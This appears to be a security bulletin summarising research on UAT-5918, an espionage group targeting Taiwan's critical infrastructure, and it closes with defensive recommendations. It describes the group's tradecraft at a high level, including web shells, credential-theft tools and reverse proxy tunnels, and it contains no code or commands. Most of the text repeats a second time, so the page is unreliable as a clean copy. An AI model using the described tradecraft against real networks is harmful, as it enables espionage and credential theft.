UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools
Summary:
Cisco Talos researchers have identified a previously unknown threat actor, UAT-5918, which has been actively targeting critical infrastructure in Taiwan since at least 2023. The group is believed to be an advanced persistent threat actor focused on establishing long-term access to victim environments for the purpose of espionage and data theft. In addition to critical infrastructure, UAT-5918 has also targeted organizations in sectors such as information technology, telecommunications, academia, and healthcare. The group’s operations are characterized by the use of web shells and open-source tools to conduct post-compromise activity, including credential harvesting and establishing persistence across multiple entry points. Once inside a network, UAT-5918 leverages tools such as Fast Reverse Proxy (FRP) and Neo-reGeorge to set up reverse proxy tunnels, allowing them to access compromised systems remotely via attacker-controlled hosts.
Initial access is typically gained through the exploitation of N-day vulnerabilities,publicly known but unpatched security flaws, iin internet-exposed web and application servers. From there, UAT-5918 deploys a range of open-source tools to perform system reconnaissance, gather host and network information, and move laterally within the environment. Among the tools used for credential theft are Mimikatz and LaZagne, along with a browser-based extractor named BrowserDataLite, which is designed to collect login credentials, cookies, and browsing history from local web browsers. Once credentials are obtained, the group utilizes remote access methods such as RDP, WMIC, and Impacket to expand their reach within the network.
Security Officer Comments:
The actor also makes heavy use of web shells to maintain persistence. Notably, they deploy the Chopper web shell, as well as Crowdoor and SparrowDoor—both of which have been associated in past campaigns with another China-linked group, Earth Estries. This overlap in tooling and techniques suggests tactical similarities between UAT-5918 and other China-based actors such as Volt Typhoon, Flax Typhoon, Tropic Trooper, and Dalbit. During their post-compromise activity, UAT-5918 appears to operate manually, often deploying web shells across discovered subdomains and other internet-accessible infrastructure to create redundant access points. Additionally, they conduct systematic data theft by scanning local and shared drives for files of interest.
According to the researchers, the group's primary motivation appears to be intelligence collection rather than disruption, and the use of manual techniques during post-exploitation indicates a high degree of operator control and targeting precision.
Suggested Corrections:
Organizations can make APT groups’ lives more difficult. Here’s how:
Link(s):
https://thehackernews.com/2025/03/uat-5918-targets-taiwans-critical.html
Cisco Talos researchers have identified a previously unknown threat actor, UAT-5918, which has been actively targeting critical infrastructure in Taiwan since at least 2023. The group is believed to be an advanced persistent threat actor focused on establishing long-term access to victim environments for the purpose of espionage and data theft. In addition to critical infrastructure, UAT-5918 has also targeted organizations in sectors such as information technology, telecommunications, academia, and healthcare. The group’s operations are characterized by the use of web shells and open-source tools to conduct post-compromise activity, including credential harvesting and establishing persistence across multiple entry points. Once inside a network, UAT-5918 leverages tools such as Fast Reverse Proxy (FRP) and Neo-reGeorge to set up reverse proxy tunnels, allowing them to access compromised systems remotely via attacker-controlled hosts.
Initial access is typically gained through the exploitation of N-day vulnerabilities,publicly known but unpatched security flaws, iin internet-exposed web and application servers. From there, UAT-5918 deploys a range of open-source tools to perform system reconnaissance, gather host and network information, and move laterally within the environment. Among the tools used for credential theft are Mimikatz and LaZagne, along with a browser-based extractor named BrowserDataLite, which is designed to collect login credentials, cookies, and browsing history from local web browsers. Once credentials are obtained, the group utilizes remote access methods such as RDP, WMIC, and Impacket to expand their reach within the network.
Security Officer Comments:
The actor also makes heavy use of web shells to maintain persistence. Notably, they deploy the Chopper web shell, as well as Crowdoor and SparrowDoor—both of which have been associated in past campaigns with another China-linked group, Earth Estries. This overlap in tooling and techniques suggests tactical similarities between UAT-5918 and other China-based actors such as Volt Typhoon, Flax Typhoon, Tropic Trooper, and Dalbit. During their post-compromise activity, UAT-5918 appears to operate manually, often deploying web shells across discovered subdomains and other internet-accessible infrastructure to create redundant access points. Additionally, they conduct systematic data theft by scanning local and shared drives for files of interest.
According to the researchers, the group's primary motivation appears to be intelligence collection rather than disruption, and the use of manual techniques during post-exploitation indicates a high degree of operator control and targeting precision.
Suggested Corrections:
Organizations can make APT groups’ lives more difficult. Here’s how:
- Defense-in-depth strategy: A comprehensive defense-in-depth strategy is crucial to combat APTs. This includes implementing multiple layers of security controls, such as strong perimeter defenses, network segmentation, endpoint protection, intrusion detection systems, data encryption, access controls, and continuous monitoring for anomalies.
- Threat intelligence and sharing: Ideally, organizations should actively participate in threat intelligence sharing communities and collaborate with industry peers, government agencies, and security vendors. Sharing information about APTs and their techniques can help detect and mitigate attacks more effectively.
- Employee education and awareness: Regular security awareness programs, phishing simulations, and training sessions can educate employees about the latest threats, social engineering techniques, and safe computing practices.
- Incident response and recovery: Regardless of preventive measures, organizations should have a well-defined incident response plan. This includes incident detection, containment, eradication, and recovery procedures to minimize the impact of APT attacks and restore normal operations.
Link(s):
https://thehackernews.com/2025/03/uat-5918-targets-taiwans-critical.html